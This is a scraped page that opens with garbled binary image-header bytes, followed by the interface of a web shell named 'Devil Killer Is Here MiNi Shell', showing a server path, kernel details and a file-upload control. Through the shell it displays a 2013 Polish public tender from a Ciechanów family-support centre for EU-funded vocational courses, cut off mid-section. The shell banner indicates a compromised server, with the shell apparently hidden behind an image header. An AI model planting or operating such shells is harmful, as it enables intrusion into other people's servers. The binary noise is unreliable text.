JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130605/100277-N-2013.html

<p class="kh_header"><b>Ciechanów: Zorganizowanie i przeprowadzenie kursów:  Część I -prawa jazdy kat.C, Część II - wizaż i stylizacja paznokci, Część III - księgowości komputerowej Część IV - operator koparko-ładowarki, Część V - ochrona osób i mienia I stopnia,- uczestników projektu Aktywność szansą na zatrudnienie i usamodzielnienie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 100277 - 2013; data zamieszczenia: 05.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. 17 Stycznia 7, 06-400 Ciechanów, woj. mazowieckie, tel. 023 672 52 16, 673 45 44, faks 023 672 52 16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr-ciechanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: powiatowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kursów:  Część I -prawa jazdy kat.C, Część II - wizaż i stylizacja paznokci, Część III - księgowości komputerowej Część IV - operator koparko-ładowarki, Część V - ochrona osób i mienia I stopnia,- uczestników projektu Aktywność szansą na zatrudnienie i usamodzielnienie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I Zorganizowanie i przeprowadzenie kursu prawa jazdy kat.Cdla 2 osób,w tym:1usamodzielnianego wychowanka z zastępczych form opieki oraz 1osoby niepełnosprawnej,mieszkańców powiatu ciechanowskiego - uczestników projektu Aktywność szansą na zatrudnienie i usamodzielnienie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. 
Celem kursu jest zdobycie niezbędnej wiedzy teoretycznej i praktycznej, pozwalającej na przystąpienie do egzaminu dającego uprawnienia do prowadzenia pojazdów w wyżej wymienionej kategorii. Program zajęć teoretycznych i praktycznych prawa jazdy kat.C w zakresie merytorycznym i czasowym, a także zakres posiadanych uprawnień przez osoby prowadzące kurs ma być zgodny z Rozporządzeniem Ministra Transportu,Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012r.w sprawie szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami,instruktorów i wykładowców(Dz.U.z 2012 r.poz.1019)wydanego na podstawie art.32 ust.3 ustawy z dnia 5 stycznia 2011 r. o kierujących pojazdami (Dz.U.Nr 30, poz.151,z późniejszymi zmianami).Dodatkowa ilość praktycznej  nauki   jazdy dla każdego uczestnika kursu  ma wynosić co najmniej 15 godzin.
Zajęcia muszą odbywać się w dni robocze(od poniedziałku do piątku)w mieście Ciechanów w budynku o dogodnej lokalizacji dla osób dojeżdżających z terenu Powiatu Ciechanowskiego(położonego nie dalej niż 400m od najbliższego przystanku komunikacji miejskiej).Wykonawca zobowiązany jest:1)Opracować program kursu i przedłożyć go Zamawiającemu w dniu składania ofert wraz z ofertą jako załącznik do niej.Program musi zawierać:a)nazwę i zakres kursu,b)podanie adresu miejsca,gdzie odbywać się będzie kurs,c)czas trwania kursu (daty i godziny)d)plan nauczania,określający zakres tematyczny zajęć i ich wymiar,e)cele kursu (przewidywane efekty).2)zapewnić uczestnikom kursu salę wyposażoną w sprzęt niezbędny w zakresie realizacji tematyki szkolenia oraz samochody szkoleniowe,3)zapewnić prowadzenie szkolenia przez osoby o odpowiednich kwalifikacjach-w uzasadnionych przypadkach po rozpoczęciu szkolenia za pisemną zgodą Zamawiającego może nastąpić zmiana osób prowadzących szkolenie,4)zapewnić uczestnikom kursu materiały dydaktyczne(w tym:notes, długopis,podręcznik dla osób ubiegających się o prawo jazdy kat.Coraz testy na CD),które staną się własnością uczestników kursu,5)zapewnić każdemu uczestnikowi catering każdego dnia kursu podczas zajęć teoretycznych (tj.dwudaniowy obiad-zupa i drugie danie, kawę, herbatę, wodę mineralną gazowaną i niegazowaną,ciastka,ciasto,owoce),6)zapewnić ubezpieczenie2osób-uczestników kursu przez okres trwania kursu,7)uwzględnić w cenie oferty koszt dodatkowych co najmniej 15godzin nauki jazdy dla każdego uczestnika oraz egzaminu państwowego:teoretycznego i praktycznego,dla każdego uczestnika kursu.8)informować o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji kursowej informacji o udziale Unii Europejskiej, a także oznakowania miejsca realizacji kursu, zgodnie z wymogami Rozporządzenia Rady(WE) nr1083/2006z dnia 11lipca2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego,Europejskiego Funduszu Społecznego oraz Funduszu Spójności(Dz.Urz.UE L 210/25 z 31.07.2006)oraz Rozporządzenia Komisji WE nr1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr1083/2006(Dz.Urz. UE L 371/1 z 27.12.2006)i wytycznymi dotyczącymi oznaczania projektów w ramach PO KL 2007-2013,9)zapewnić uczestnikom kursu warunki do nauki w oparciu o zasady BHP,10)przeprowadzić wśród uczestników zajęć ocenę merytoryczną i techniczną przebiegu kursu,m.in.na podstawie formularza ankiety oceniającej i przedstawić jej wyniki Zamawiającemu,11)Prowadzić odpowiednią dokumentację:
a)dziennik zajęć,b)imienną listę obecności uczestnika(w każdym dniu kursu),
c)imienną listę,na której uczestnicy kursu będą potwierdzać otrzymanie materiałów dydaktycznych;d)imienną  listę,na której uczestnicy kursu będą potwierdzać korzystanie z cateringu(w każdym dniu kursu);e)indywidualne karty przeprowadzonych zajęć w części teoretycznej i praktycznej dla każdego uczestnika kursu moduł prawa jazdy kat.C;f)indywidualne arkusze przeprowadzonego egzaminu wewnętrznego teoretycznego i praktycznego osoby ubiegającej się o uprawnienie do prowadzenia pojazdów dla kat.C;g)wystawić zaświadczenia o ukończeniu przez uczestników szkolenia podstawowego dla osób ubiegających się o prawo jazdy kat.C;
12)wystawić zaświadczenia potwierdzone podpisem uczestnika o wyjeżdżeniu przez niego dodatkowych co najmniej15godzin praktycznej nauki jazdy,13)przedłożyć dowód wniesienia opłaty za egzamin państwowy na prawo jazdy kat.Cdla każdego uczestnika kursu,14)niezwłocznie, nie później jednak niż w ciągu24godzin od zdarzenia, poinformować Zamawiającego o:a)nie zgłaszaniu się uczestników na kurs; b)przerwaniu kursu lub rezygnacji uczestnika;c)innych sytuacjach, które mogą mieć wpływ na realizację programu kursu i umowy,15)przekazać Zamawiającemu,w terminie do7dni od dnia zakończenia kursu,następujące dokumenty:a)dziennik zajęć,b)imienną listę obecności uczestnika (w każdym dniu kursu),c)imienną listę, na której uczestnicy kursu  potwierdzali otrzymanie materiałów dydaktycznych,d)imienną listę, na której uczestnicy kursu potwierdzali korzystanie z cateringu (w każdym dniu kursu),e)kserokopie indywidualnych kart przeprowadzonych zajęć w części teoretycznej i praktycznej dla każdego uczestnika kursu moduł prawa jazdy kat.C,
f) kserokopie indywidualnych arkuszy przeprowadzonego egzaminu wewnętrznego teoretycznego i praktycznego osoby ubiegającej się o uprawnienie do prowadzenia pojazdów dla kat.C,g) kserokopie zaświadczeń o ukończeniu przez uczestników szkolenia podstawowego dla osób ubiegających się o prawo jazdy kat.C,
h)zaświadczeń o wyjeżdżeniu przez uczestnika dodatkowych co najmniej15godzin praktycznej nauki jazdy,i)kserokopie dowodu  wniesienia opłaty za egzamin państwowy na prawo jazdy kat.Cza każdego uczestnika, j)kserokopie dowodu ubezpieczenia uczestników na czas trwania kursu,k)kserokopie zaświadczeń o ukończeniu kursu,l)ankiety oceniające kurs przeprowadzone wśród uczestników.
16)przechowywać dokumenty potwierdzające realizację przedmiotowego kursu do dnia 31.12.2020 r.
Część II Zorganizowanie i przeprowadzenie kursu wizażu i stylizacji paznokci dla 5 osób,w tym:2osób przebywających w rodzinnej pieczy zastępczej i 3osób niepełnosprawnych mieszkańców powiatu ciechanowskiego-uczestników projektu Aktywność szansą na zatrudnienie i usamodzielnienie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.Program zajęć teoretycznych i praktycznych ma obejmować130godzin lekcyjnych(w tym:90 godzin-wizaż i 40godzin-stylizacja paznokci).Zajęcia muszą odbywać się w dni robocze(od poniedziałku do piątku)w mieście Ciechanów,w budynku pozbawionym barier architektonicznych,o lokalizacji dogodnej dla osób dojeżdżających z terenu Powiatu Ciechanowskiego(położonego nie dalej niż400m.od najbliższego przystanku komunikacji miejskiej).Wykonawca zobowiązany jest:1)opracować program kursu i przedłożyć go Zamawiającemu w dniu składania ofert wraz z ofertą jako załącznik do niej.Program musi zawierać:a)nazwę i zakres kursu;b)miejsce,gdzie odbywać się będzie kurs;c)czas trwania kursu(data i godziny);d)plan nauczania określający tematy zajęć oraz ich wymiar;2)zapewnić uczestnikom kursu salę wyposażoną w sprzęt niezbędny w zakresie realizacji tematyki 	szkolenia,tj.fotele obrotowe,lustra, zestawy pędzli do makijażu,aplikatory do cieni,gąbki do podkładu, zestawy korektorów,palety:podkładów,pomadek,błyszczyków,pudrów i cieni,płyny 	micelarne,zalotki,sztuczne rzęsy,szczoteczki do rzęs i brwi,pensety kosmetyczne, eyelinery,konturówki do oczu,tusze do rzęs,stoliki kosmetyczne do stylizacji paznokci, lampki oświetleniowe,frezarki,profesjonalne lampy UV,sprzęt do pedicure(miski+ jednorazowe wkłady,podnóżki),tipsy naturalne,szablony,klej do tipsów,gilotynki, zestaw pilników,bloki polerskie,zestaw żeli do manicure hybrydowego,lakiery hybrydowe,cleanery,płyn do zdejmowania tipsów,płyn do czyszczenia pędzelków, waciki bezpyłowe,pędzelki do nakładania żelu,oliwkę do skórek,primer,preparat do usuwania skórek,miseczki do manicure,cążki do wycinania skórek,kopytko ze stali chirurgicznej,ozdoby do paznokci,lakiery:linery,podkładowe,utwardzające,odżywki do paznokci,zmywacze,preparat odtłuszczający,ręczniki jednorazowe,środki dezynfekujące.3)zapewnić prowadzenie szkolenia przez osoby o odpowiednich kwalifikacjach-w uzasadnionych przypadkach za pisemną zgodą Zamawiającego może nastąpić w trakcie szkolenia zmiana osób prowadzących szkolenie,4)zapewnić każdemu uczestnikowi catering każdego dnia kursu podczas zajęć teoretycznych(tj. dwudaniowy obiad-zupa i drugie danie,kawę,herbatę,wodę mineralną gazowaną i niegazowaną,ciastka,ciasto,owoce),5)zapewnić ubezpieczenie5osób-uczestników kursu przez okres trwania kursu,6)zapewnić każdemu uczestnikowi materiały dydaktyczne(długopis,notes)i kuferek ze starterami zawierającymi niezbędne akcesoria,które staną się własnością uczestników kursu:1.Wizaż Zestaw pędzli:do nakładania podkładu,do pudru,ścięty ukośnie do różu,wachlarz,ścięty do brwi,zaokrąglony do cieni,liner do wykonywania kreski,płaski do ust Aplikator z gąbki do cieni-6 szt.-różne rodzaje Trójkątne gąbki do podkładu-4 szt.Korektor-6 kolorów Paleta podkładów-6kolorów Paleta pomadek(10kolorów)Paleta błyszczyków(10 kolorów)Paleta pudrów(rozświetlający,matujący,bronzer,róż do policzków)
Płyn micelarny-1szt.Lusterko stojące dwustronne,powiększeniex5Zalotka-1szt. Sztuczne rzęsy całe,kępki,z klejem do rzęs Szczoteczka do rzęs-1 szt.Szczoteczka do brwi i grzebyk-1szt.Penseta kosmetyczna do regulacji brwi-1szt.Paleta cieni-1 szt.(24 kolory)Eyeliner czarny-1szt.Konturówka do oczu(+ew.temperówka),
Tusz do rzęs-2kolory,1.Stylizacja paznokci Profesjonalna lampa UV36W tunelowa-1 szt.Żarówki 9W do kompletu-4 szt.Żel clear(przezroczysty)5ml-1 szt.Żel pink (różowy)5ml-1 szt.Żel biały do frenchu Żel nabłyszczający wykończeniowy Tipsy naturalne w rozmiarach od1do10,elastyczne i mocne-1saszetka(100szt.)Szablony-10szt.Klej do tipsów3g super mocny-1szt.Gilotyna-1szt.Pilnik prosty80/80-2szt. Pilnik banan100/180-2szt.Blok polerski biały100/100-1szt.Patyczki z drzewa pomarańczowego-5szt.Cleaner-płyn do przemywania masy żelowej100ml-1szt.Tips off-płyn do zdejmowania tipsów100ml-1szt.Brush cleaner-płyn do czyszczenia pędzelków100ml-1szt.Waciki bezpyłowe-250szt.Najwyższej jakości pędzelek do nakładania żelu-włosie Toray-1szt.Oliwka do skórek15ml-1szt.Primer-wytrawiacz 6ml-1szt.Cuticle remover-preparat do usuwania skórek6ml-1 szt. Miseczka do manicure Cążki do wycinania skórek Kopytko ze stali chirurgicznej Karuzela pełna ozdób-1szt.Korektor lakieru w pisaku(wymienne końcówki)-1szt.Lakier-liner z cienkim pędzelkiem-1szt.Lakier podkładowy-1szt.Lakier utwardzający-1szt.Komplet lakierów do paznokci-różne kolory-10szt.Wysuszacz lakieru-1szt.Lakier żelowy UV TOP/BASE (2w1)-6ml Lakier żelowy UV kolor-2szt.-6ml Odżywka keratyna ew. jedwabna-1szt.Bezacetonowy zmywacz do paznokci-1szt.Preparat odtłuszczający-1szt.7)informować o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji kursowej informacji o udziale Unii Europejskiej,a także oznakowania miejsca realizacji kursu,zgodnie z wymogami Rozporządzenia Rady(WE) nr1083/2006z dnia 11 lipca2006r.ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego,EFS oraz Funduszu Spójności(Dz.Urz.UE L 210/25 z31.07.2006)oraz Rozporządzenia Komisji WE nr1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr1083/2006(Dz.Urz.UE L 371/1 z27.12.2006)i wytycznymi dotyczącymi oznaczania projektów w ramach PO KL 2007-2013.8)zapewnić uczestnikom kursu warunki do nauki zgodne z zasadami BHP.9)przeprowadzić wśród uczestników zajęć ocenę merytoryczną i techniczną przebiegu kursu,m.in.na podstawie formularza ankiety oceniającej i przedstawić jej wyniki Zamawiającemu.10)prowadzić odpowiednią dokumentację składającą się co najmniej z:a)dziennika zajęć;b)imiennej listy obecności uczestników kursu(w każdym dniu kursu);c)imiennej listy, na której uczestnicy kursu będą potwierdzać otrzymanie materiałów dydaktycznych i startera;d)imiennej listy,na której uczestnicy kursu będą potwierdzać odbiór cateringu(w każdym dniu kursu);11)wystawić zaświadczenia o ukończeniu przez każdego z uczestników kursu.12)Niezwłocznie, nie później jednak niż w ciągu 24 godzin od zdarzenia, poinformować Zamawiającego o:a)nie zgłaszaniu się uczestników;b)przerwaniu kursu lub rezygnacji uczestnika;c)innych sytuacjach,które mogą mieć wpływ na realizację programu kursu i umowy.13)przekazać Zamawiającemu,w terminie do7dni od dnia zakończenia kursu,następujących dokumentów:a)dziennika zajęć;b)imiennej listy obecności uczestników kursu(w każdym dniu kursu);c)imiennej listy,na której uczestnicy kursu będą potwierdzać otrzymanie materiałów dydaktycznych i startera;d)imiennej listy,na której uczestnicy kursu będą potwierdzać odbiór cateringu(w każdym dniu kursu);e)zaświadczeń o ukończeniu przez uczestników kursu;f)ankiet oceniających przeprowadzonych wśród uczestników kursu,g)dowodu ubezpieczenia uczestników na czas trwania kursu.14)Przechowywać dokumenty potwierdzające realizację przedmiotowego kursu do dnia 31.12.2020r.
Część III Zorganizowanie i przeprowadzenie kursu księgowości komputerowej dla3 osób niepełnosprawnych, mieszkańców powiatu ciechanowskiego-uczestników projektu Aktywność szansą na zatrudnienie i usamodzielnienie współfinansowanego ze środków Unii europejskiej w ramach Europejskiego funduszu Społecznego.
Program zajęć teoretycznych i praktycznych ma obejmować łącznie150godzin lekcyjnych(80 godzin zajęć teoretycznych i70godzin zajęć praktycznych).Zajęcia muszą odbywać się w dni robocze(od poniedziałku do piątku)w mieście Ciechanów. Szkoleniem należy objąć tematykę z zakresu:rachunkowości,sprawozdawczości, prawa podatkowego,prawa ubezpieczeń społecznych,podstaw prawa pracy i obsługi komputerowego programu księgowego np. komputerowa książka przychodów i rozchodów.Wykonawca zobowiązany jest:1)Opracować program kursu i przedłożyć go Zamawiającemu w dniu składania ofert wraz 	z ofertą jako załącznik do niej.Program musi zawierać:a)nazwę i zakres kursu,b)czas trwania kursu(daty i godziny)c)plan nauczania, określający zakres tematyczny zajęć i ich wymiar,d)cele kursu (przewidywane efekty).2)Zapewnić prowadzenie szkolenia przez osoby o odpowiednich kwalifikacjach-w uzasadnionych przypadkach za pisemną zgodą Zamawiającego w trakcie szkolenia może 	nastąpić zmiana osób prowadzących szkolenie,3)zapewnić uczestnikom kursu materiały dydaktyczne(w tym co najmniej: notes,długopis,skrypt/podręcznik),które staną się własnością uczestników kursu,4)zapewnić salę wykładową oraz sprzęt komputerowy dla każdego uczestnika kursu,5)zapewnić każdemu uczestnikowi catering każdego dnia kursu(tj.dwudaniowy obiad-zupa i drugie danie,kawę,herbatę,wodę mineralną gazowaną i niegazowaną,ciastka,ciasto,owoce),6)ubezpieczyć3uczestników na czas trwania kursu,7)informować o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji kursowej informacji o udziale Unii Europejskiej,a także oznakowania miejsca realizacji kursu, zgodnie z wymogami Rozporządzenia Rady(WE) nr1083/2006 z dnia 11lipca2006r.ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego,Europejskiego Funduszu Społecznego oraz Funduszu Spójności(Dz.Urz.UE L 210/25 z31.07.2006)oraz Rozporządzenia Komisji WE nr1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr1083/2006(Dz.Urz.UE L 371/1 z27.12.2006) i wytycznymi dotyczącymi oznaczania projektów w ramach PO KL 2007-2013.8)zapewnić uczestnikom kursu warunki do nauki w oparciu o zasady BHP,9)zorganizować i przeprowadzić egzamin wewnętrzny i wydać zaświadczenia o ukończeniu kursu zgodnie ze wzorem MEN10)przeprowadzić wśród uczestników kursu ocenę merytoryczną i techniczną  przebiegu kursu,m.in.na podstawie formularza ankiety oceniającej i przedstawić jej wyniki Zamawiającemu.11)prowadzić odpowiednią dokumentację:a)dziennik zajęć,b)imienną listę obecności uczestnika(w każdym dniu kursu),c)imienną listę,na której uczestnicy kursu będą potwierdzać otrzymanie materiałów dydaktycznych;d)imienną listę,na której uczestnicy kursu będą potwierdzać korzystanie z cateringu(w każdym dniu kursu);
e)indywidualne karty przeprowadzonych zajęć w części teoretycznej i praktycznej dla każdego uczestnika kursu;f)protokołu i karty oceny z okresowych sprawdzianów efektów kształcenia oraz egzaminu końcowego,jeżeli zostały przeprowadzone;g)przedłożyć dowód ubezpieczenia2uczestników na czas trwania kursu,h)wystawić zaświadczenia o ukończeniu kursu.12)Niezwłocznie,nie później jednak niż w ciągu24godzin od zdarzenia, poinformować Zamawiającego o:a)nie zgłaszaniu się uczestników na kurs,b)przerwaniu kursu lub rezygnacji uczestnika,
c)innych sytuacjach,które mogą mieć wpływ na realizację programu kursu i umowy.
13)przekazać Zamawiającemu,w terminie do7dni od dnia zakończenia kursu,następujące dokumenty:a)dziennik zajęć,b)imienną  listę obecności uczestnika  (w każdym dniu kursu),c)imienną listę,na której uczestnicy kursu potwierdzali otrzymanie materiałów dydaktycznych,d) imienną listę,na której uczestnicy kursu potwierdzali korzystanie z cateringu(w każdym dniu kursu),e)kserokopie indywidualnych kart przeprowadzonych zajęć w części teoretycznej i praktycznej dla każdego uczestnika kursu,f)zaświadczeń o ukończeniu przez uczestników kursu,g)kserokopie dowodu ubezpieczenia uczestników na czas trwania kursu,h)kserokopie zaświadczeń o ukończeniu kursu,i)ankiety oceniające kurs przeprowadzone wśród uczestników.14)przechowywać dokumenty potwierdzające realizację kursu do dnia31.12.2020r.
Część IV Zorganizowanie i przeprowadzenie kursu na operatora koparko-ładowarki kl. III dla3osób,w tym:2usamodzielnianych wychowanków z zastępczych form opieki oraz 1 osoby przebywającej w rodzinnej pieczy zastępczej, mieszkańców powiatu ciechanowskiego-uczestników projektu Aktywność szansą na zatrudnienie i usamodzielnienie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.Celem szkolenia jest przygotowanie uczestników do uzyskania kwalifikacji w zawodzie operatora koparko-ładowarki w zakresie III klasy uprawnień.Program zajęć teoretycznych i praktycznych ma obejmować łącznie202godziny.Plan nauczania powinien obejmować nie mniej niż25 godzin zegarowych  w tygodniu.Szkolenie musi zostać zorganizowane zgodnie z Rozporządzeniem Ministra Gospodarki z dnia20września2001r.w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych(Dz.U.z 2001r.Nr118 poz.1263).Zajęcia muszą odbywać się w dni robocze(od poniedziałku do piątku)w mieście Ciechanów w budynku o lokalizacji dogodnej dla osób dojeżdżających z terenu Powiatu Ciechanowskiego(położonego nie dalej niż400m od najbliższego przystanku komunikacji miejskiej).Wykonawca zobowiązany jest:1)Opracować program kursu i przedłożyć go Zamawiającemu w dniu składania ofert wraz z ofertą jako załącznik do niej.Program musi zawierać:a)nazwę i zakres kursu,b)podanie adresu miejsca,gdzie odbywać się będzie kurs,c)czas trwania kursu(daty i godziny) d)plan nauczania,określający zakres tematyczny zajęć i ich wymiar,e)cele kursu  (przewidywane efekty).2)zapewnić prowadzenie szkolenia przez osoby o odpowiednich kwalifikacjach-w uzasadnionych przypadkach za pisemną zgodą Zamawiającego w trakcie szkolenia może 	nastąpić zmiana osób prowadzących szkolenie,3)opłacić i zorganizować egzamin końcowy zewnętrzny przed komisją powołaną przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie,zgodnie z Rozporządzeniem Ministra Gospodarki z dnia20.09.2001r, w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz.U. Nr118 poz.1263),4)zapewnić uczestnikom kursu materiały dydaktyczne(w tym co najmniej: notes,długopis,skrypt/podręcznik),które staną się własnością uczestników kursu,5)zapewnić do zajęć praktycznych sprzęt adekwatny do przedmiotu zamówienia umożliwiający realizację szkolenia,do zajęć teoretycznych salę wykładową wyposażoną w co najmniej 3 stanowiska dla uczestników szkolenia, sprzęt niezbędny w zakresie realizacji tematyki szkolenia,6)zapewnić każdemu uczestnikowi catering każdego dnia kursu podczas zajęć teoretycznych(tj. dwudaniowy obiad-zupa i drugie danie,kawę,herbatę,wodę mineralną gazowaną i niegazowaną,ciastka,ciasto,owoce),7)ubezpieczyć 3 uczestników na czas trwania kursu,8)informować o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji kursowej informacji o udziale Unii Europejskiej,a także oznakowania miejsca realizacji kursu,zgodnie z wymogami Rozporządzenia Rady (WE)nr 1083/2006 z dnia 11 lipca 2006r.ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego,Europejskiego Funduszu Społecznego oraz Funduszu Spójności(Dz.Urz. UE L 210/25 z31.07.2006)oraz Rozporządzenia Komisji WE nr1828/2006 ustanawiającego szczegółowe zasady wykonania 	Rozporządzenia Rady WE nr1083/2006(Dz.Urz.UE L 371/1 z27.12.2006)i wytycznymi dotyczącymi oznaczania projektów w ramach PO KL 2007-2013.9)zapewnić uczestnikom kursu warunki do nauki w oparciu o zasady BHP,10)przeprowadzić wśród uczestników kursu ocenę merytoryczną i techniczną  przebiegu kursu,m.in.na podstawie formularza ankiety oceniającej i przedstawić jej wyniki Zamawiającemu.11)prowadzić odpowiednią dokumentację:a)dziennik 